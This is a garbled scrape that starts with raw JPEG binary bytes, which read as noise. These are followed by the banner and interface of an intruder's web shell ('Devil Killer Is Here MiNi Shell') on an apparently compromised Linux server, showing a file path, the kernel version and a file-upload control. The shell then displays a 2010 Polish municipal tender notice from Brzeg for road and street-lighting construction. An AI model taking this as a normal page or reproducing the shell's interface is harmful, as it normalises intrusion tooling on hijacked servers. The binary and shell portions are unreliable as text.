JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100324/65365-N-2010.html

<p class="kh_header"><b>Brzeg: Budowa ulicy Piwowarskiej w Brzegu - etap I       Rozbudowa drogi wewnętrznej łączącej ul. Piwowarską i ul. Bohaterów Monte Cassino</b><br>
<b>Numer ogłoszenia: 65365 - 2010; data zamieszczenia: 24.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Brzeg - Burmistrz Miasta Brzegu , ul. Robotnicza 12, 49-300 Brzeg, woj. opolskie, tel. 0077 4169950, faks 077 4169952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.brzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ulicy Piwowarskiej w Brzegu - etap I       Rozbudowa drogi wewnętrznej łączącej ul. Piwowarską i ul. Bohaterów Monte Cassino.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający powierza, a Wykonawca zobowiązuje się do wykonania zadania pn.:    Budowa ulicy Piwowarskiej w Brzegu - etap I Rozbudowa drogi wewnętrznej łączącej ul. Piwowarską i ul. Bohaterów Monte Cassino.
     W ramach przedmiotu umowy, określonego w ust. 1 wzoru umowy - Wykonawca    zobowiązany jest do :
1) Rozbudowy oświetlenia ulicznego (odcinek pomiędzy ul. Piwowarską, a ul. Bohaterów Monte Cassino)  wraz z demontażem starego istniejącego oświetlenia ulicznego.
2) Przebudowy istniejącej linii napowietrznej oświetlenia ulicznego ul. Bohaterów Monte Cassino.
3) Zabezpieczenia istniejących linii kablowych niskiego napięcia.
4) Przebudowy i zabezpieczenia istniejącej linii kablowej średniego napięcia.
5) Wykonania ochrony przed porażeniem prądem elektrycznym.
6) Przebudowy i zabezpieczenia istniejących sieci telekomunikacyjnych Netia S.A.
7) Przebudowy i zabezpieczenia istniejących sieci telekomunikacyjnych TP S.A.
Ponadto Wykonawca zobowiązuje się wykonać wszystkie czynności wynikające z 

uzgodnień załączonych do projektów wykonawczych, a to :
1) Z warunków przyłączenia RD3/9/RDE9/W/WK/5056/07/4401  z dnia 20.09.2007 r. wydanych przez EnergiaPro Rejon Dystrybucji w Brzegu i prolongaty ww. warunków przyłączenia pismo RD3/RDE9/WK/4112- W-585/4130/4117 z dnia 01.10.2009 r.
2)  Z Opinii koordynacyjnej G.I.7442-395/2007 z dnia 03.12.2007 r. wydanej przez Powiatowy Zespół Uzgadniania Dokumentacji Projektowej w Brzegu.
3)  Z uzgodnienia RD3/9/RDE9/P/SO/1134/5001/07/4335 z dnia 17.09.2007 r. wydanego przez EnergiaPro  Rejon Dystrybucji w Brzegu ( w szczególności pkt. 5 uzgodnienia).
4)  Z porozumienia nr RDE9/3/1/2008 zawartego w dniu 26.02.2008 r. z EnergiaPro Rejon Dystrybucji w Brzegu (w szczególności  § 2, § 4, §5)
5)  Z warunków technicznych znak N/SWRiAK-07/1794/IS z dnia 11.09.2007 r. wydanych przez Netia S.A.
6)  Z uzgodnienia znak E/S/08/68/IS z dnia 07.01.2008 r. wydanego przez ERICSSON sp. z o.o.
7)  Z prolongaty warunków technicznych znak E/S/09/1833/MP z dnia 30.11.2009 r. wydanych przez Netia S.A.
Przedmiot umowy wymieniony w § 1 ust. 2 wzoru umowy Wykonawca zobowiązuje się wykonać zgodnie z    branżowymi projektami  budowlano-wykonawczymi, przedmiarami  robót i specyfikacjami technicznymi wykonania i odbioru robót, stanowiącymi integralną część wzoru umowy.
     Wykonawca zobowiązuje się wykonać całość robót określonych w § 1 wzoru umowy w terminie 3 miesięcy od  dnia zawarcia umowy.
     Zamawiający przekaże Wykonawcy branżowe projekty budowlano-wykonawcze umowy wraz z pozwoleniem na budowę, specyfikacje techniczne wykonania i odbioru robót budowlanych na wykonanie przedmiotu umowy w terminie do 3 dni od dnia podpisania umowy.
     Zamawiający  oświadcza, że posiada prawo dysponowania nieruchomością na cele budowlane. Z  chwilą przejęcia protokolarnie terenu budowy Wykonawca ponosi pełną odpowiedzialność za ten teren.
Całość robót określonych umową Wykonawca zobowiązuje się wykonać z materiałów i przy użyciu narzędzi i sprzętu będących w dyspozycji Wykonawcy. 
Wykonawca może powierzyć wykonanie części robót Podwykonawcom.
Wykonawca zobowiązuje się zorganizować zaplecze budowy wraz z przyłączeniem i dostawą mediów na własny koszt na terenie udostępnionym przez Zamawiającego.
Wykonawca zobowiązuje się strzec mienia znajdującego się na terenie budowy, a także zapewnić warunki bezpieczeństwa na terenie budowy dla pracowników i osób postronnych zgodnie z przepisami bhp i ppoż.
Wykonawca zobowiązuje się do postępowania z powstałymi w trakcie procesu budowlanego odpadami w sposób określony w ustawie z dnia 27.04.2001r. o odpadach. 
W czasie realizacji robót Wykonawca zobowiązuje się do :
a)  prowadzenia prac przy funkcjonującej infrastrukturze miejskiej ( ulice, chodniki,   dojazdy do posesji ) przy
       pełnym obciążeniu ruchem pojazdów i pieszych,
b) właściwego zabezpieczenia terenów przyległych przed uciążliwością prac  budowlanych, 
c)  zlokalizowania w okolicach bram wjazdowych stanowiska do usuwania zabrudzeń z kół pojazdów opuszczających teren budowy,
d)  umożliwienia dostępu na sąsiadujące z terenem budowy posesje służbom technicznym,
     służbom oczyszczania miasta, straży pożarnej, pogotowiu ratunkowemu oraz innym
     służbom miejskim.


Wykonawca zobowiązuje się do ubezpieczenia terenu prac z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej.
Wykonawca zobowiązany jest do ubezpieczenia się od odpowiedzialności cywilnej za szkody oraz następstwa nieszczęśliwych wypadków dotyczących pracowników i osób trzecich, a powstałych w związku z prowadzonymi pracami.
Roboty budowlane, stanowiące przedmiot umowy wykonywane będą zgodnie z projektami budowlano-wykonawczymi, przedmiarami robót, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, sztuką budowlaną, obowiązującymi przepisami prawa, obowiązującymi Polskimi Normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne i higieniczne warunki pracy.
Materiały i urządzenia użyte przez Wykonawcę powinny posiadać oznakowanie CE lub B i odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania zgodnie z ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych oraz rozporządzeniami wykonawczymi, wymaganiom specyfikacji istotnych warunków zamówienia, a także wymogom dokumentacji projektowej oraz szczegółowym specyfikacjom technicznym wykonania i odbioru robót.
Na każde żądanie Zamawiającego lub Inspektora Nadzoru, Wykonawca zobowiązany jest okazać w stosunku do wskazanych materiałów: dokumenty uprawniające do oznakowania wyrobów znakiem CE i B, certyfikat na znak bezpieczeństwa, deklarację zgodności lub certyfikat zgodności z Polską Normą lub Aprobatą Techniczną.
    Wykonawca zapłaci Zamawiającemu kary umowne :
    a) za zwłokę w wykonaniu robót stanowiących przedmiot umowy w wysokości 0,2 %  wynagrodzenia Wykonawcy brutto, o którym mowa w § 9 wzoru umowy za każdy dzień zwłoki w stosunku do terminu określonego w § 2  wzoru umowy,
    b) za zwłokę w usunięciu wad stwierdzonych podczas odbioru końcowego w wysokości   0,2% wynagrodzenia Wykonawcy brutto, o którym mowa w § 9 wzoru umowy, za każdy dzień zwłoki w stosunku do terminu wyznaczonego przez Zamawiającego na usunięcie wad, zgodnie z § 10 ust. 6 lit. a),
    c) za zwłokę w usunięciu wad w okresie rękojmi lub gwarancji w wysokości 0,2%   wynagrodzenia Wykonawcy brutto, o którym mowa w § 9 wzoru umowy, za każdy dzień zwłoki w stosunku do terminu wyznaczonego przez Zamawiającego na usunięcie wad, zgodnie z § 15 ust. 2 wzoru umowy
    d) za odstąpienie od umowy przez Zamawiającego z przyczyn leżących po stronie  Wykonawcy w wysokości 10% wynagrodzenia Wykonawcy brutto, o którym mowa w § 9 wzoru umowy.
        Zamawiającemu przysługuje prawo do dochodzenia odszkodowania przewyższającego  karę umowną do wysokości  rzeczywiście poniesionej szkody.
Zamawiający ma prawo do potrącenia kar umownych z wynagrodzenia Wykonawcy.   Strony postanawiają, iż termin gwarancji na roboty budowlane wynosi 36 miesięcy licząc od daty odbioru. 
 W dniu podpisania protokółu odbioru Wykonawca zobowiązuje się przekazać Zamawiającemu stosowny dokument gwarancyjny.
Wszelkie wady wykonanych robót podczas odbioru lub w okresie gwarancji lub rękojmi  Wykonawca zobowiązany jest usuwać w terminie wyznaczonym przez Zamawiającego na ich usunięcie.  W przypadku niedotrzymania tego terminu Zamawiającemu, oprócz prawa do naliczenia kar umownych, o których mowa w § 14 wzoru umowy, służy prawo do powierzenia bez dodatkowego wezwania Wykonawcy, wykonania tych prac osobom trzecim na koszt i ryzyko Wykonawcy, na co Wykonawca wyraża zgodę. 
Skorzystanie przez Zamawiającego z powyższego uprawnienia pozostaje bez wpływu na uprawnienia Zamawiającego i zakres wynikający z udzielonej przez Wykonawcę gwarancji.


Bez pisemnej zgody Zamawiającego, Wykonawca nie może przenieść wierzytelności wynikających z umowy  na osoby trzecie.
Zamawiający dopuszcza możliwość zmiany umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach : 
1)	o których mowa w  § 3 ust. 3,
2)	wydłużenia okresu gwarancji lub rękojmi o dowolny okres,
3)	zmiany danych związanych z obsługą administracyjno-organizacyjną umowy, zmiany danych teleadresowych oraz osób wskazanych do kontaktów między Stronami, 
4)	konieczności zmiany w przedmiocie zamówienia, o ile zmiana ta nie powoduje zmiany wynagrodzenia Wykonawcy, 
5)	przedłużenia terminu wykonania umowy, w przypadku gdy:
      a) zmiana terminu wykonania umowy wynikła z przyczyn nie przewidzianych przy    zawarciu umowy,    
      b) zmiana terminu wykonania umowy jest uzasadniona warunkami atmosferycznymi, 
          uniemożliwiającymi wykonanie robót w terminie określonym umową, 
       c) zmiana terminu wykonania umowy wynika z przedłużającej się procedurą uzyskania zezwoleń,  uzgodnień, odbiorów z przyczyn nie leżących po stronie Wykonawcy, 
6)	pozostałych postanowień umowy nie stanowiących treści oferty Wykonawcy,
7)	zmiana umowy jest korzystna lub obojętna z punktu widzenia Zamawiającego.
 Zamiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze Stron, za zgodą drugiej Strony umowy, na podstawie aneksu do umowy.
Oprócz przypadków określonych  w przepisach Kodeksu cywilnego, Zamawiający  może odstąpić od umowy w przypadku :
    a) zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. W takim wypadku Zamawiający może 
        odstąpić od umowy w terminie 30 dni od powzięcia  wiadomości o tych okolicznościach,
    b) gdy Wykonawca nie wykonuje robót zgodnie z umową lub dokumentacją projektową       lub też nienależycie 
        wykonuje swoje zobowiązania umowne,
    c) gdy sytuacja finansowa Wykonawcy uległa pogorszeniu w stopniu mogącym zagrozić  należytemu wykonaniu umowy, bądź też w stosunku do Wykonawcy zostało wszczęte postępowanie likwidacyjne czy też prowadzące do rozwiązania przedsiębiorstwa, a także gdy wobec Wykonawcy wydano  nakaz zajęcia jego majątku.
Odstąpienie od umowy powinno nastąpić w formie pisemnej pod rygorem nieważności takiego odstąpienia i  powinno zawierać uzasadnienie.
W przypadku odstąpienia od umowy, Wykonawcę oraz Zamawiającego obciążają następujące 
 postanowienia szczegółowe : 
    a)  w terminie 7 dni od daty odstąpienia od umowy, Wykonawca przy udziale    Zamawiającego sporządzi szczegółowy protokół inwentaryzacji robót w toku według stanu na dzień odstąpienia,
    b)  Wykonawca zabezpieczy przerwane roboty, w zakresie obustronnie uzgodnionym, na  koszt tej strony, z   winy, której dokonano odstąpienia umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 5 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.61.10-9, 45.31.55.00-3, 45.23.23.10-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wynagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać doświadczenie polegające na wykonaniu robót budowlanych związanych z budową oswietlenia drogowego (ulicznego)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia legitymujące się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem zgodnie z poniższym wykazem: 
- kierownik budowy posiadający uprawnienia budowlane  do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalnosci instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
- pracownicy posiadający odpowiednie kwalifikacje do wykonywania robót tj. specjaliści w zakresie instalacji elektrycznych posiadajcy świadectwa kwalifikacyjne E, E SEP do 15 kV, D, D SEP do 15 kV</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać posiadanie środków finansowych lub zdolności kredytowej w wysokości co najmniej 150000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach : 
1)	o których mowa w  § 3 ust. 3 wzoru umowy,
2)	wydłużenia okresu gwarancji lub rękojmi o dowolny okres,
3)	zmiany danych związanych z obsługą administracyjno-organizacyjną umowy, zmiany danych teleadresowych oraz osób wskazanych do kontaktów między Stronami, 
4)	konieczności zmiany w przedmiocie zamówienia, o ile zmiana ta nie powoduje zmiany wynagrodzenia Wykonawcy, 
5)	przedłużenia terminu wykonania umowy, w przypadku gdy:
      a) zmiana terminu wykonania umowy wynikła z przyczyn nie przewidzianych przy    zawarciu umowy,    
      b) zmiana terminu wykonania umowy jest uzasadniona warunkami atmosferycznymi, 
          uniemożliwiającymi wykonanie robót w terminie określonym umową, 
       c) zmiana terminu wykonania umowy wynika z przedłużającej się procedurą uzyskania zezwoleń,  uzgodnień, odbiorów z przyczyn nie leżących po stronie Wykonawcy, 
6)	pozostałych postanowień umowy nie stanowiących treści oferty Wykonawcy,
7)	zmiana umowy jest korzystna lub obojętna z punktu widzenia Zamawiającego.
 Zamiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze Stron, za zgodą drugiej Strony umowy, na podstawie aneksu do umowy.
Oprócz przypadków określonych  w przepisach Kodeksu cywilnego, Zamawiający  może odstąpić od umowy w przypadku :
    a) zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. W takim wypadku Zamawiający może 
        odstąpić od umowy w terminie 30 dni od powzięcia  wiadomości o tych okolicznościach,
    b) gdy Wykonawca nie wykonuje robót zgodnie z umową lub dokumentacją projektową       lub też nienależycie 
        wykonuje swoje zobowiązania umowne,
    c) gdy sytuacja finansowa Wykonawcy uległa pogorszeniu w stopniu mogącym zagrozić  należytemu wykonaniu umowy, bądź też w stosunku do Wykonawcy zostało wszczęte postępowanie likwidacyjne czy też prowadzące do rozwiązania przedsiębiorstwa, a także gdy wobec Wykonawcy wydano  nakaz zajęcia jego majątku.
Odstąpienie od umowy powinno nastąpić w formie pisemnej pod rygorem nieważności takiego odstąpienia i  powinno zawierać uzasadnienie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.brzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Brzeg, ul. Robotnicz 12, p. 3B, parter, budynek B.</p>
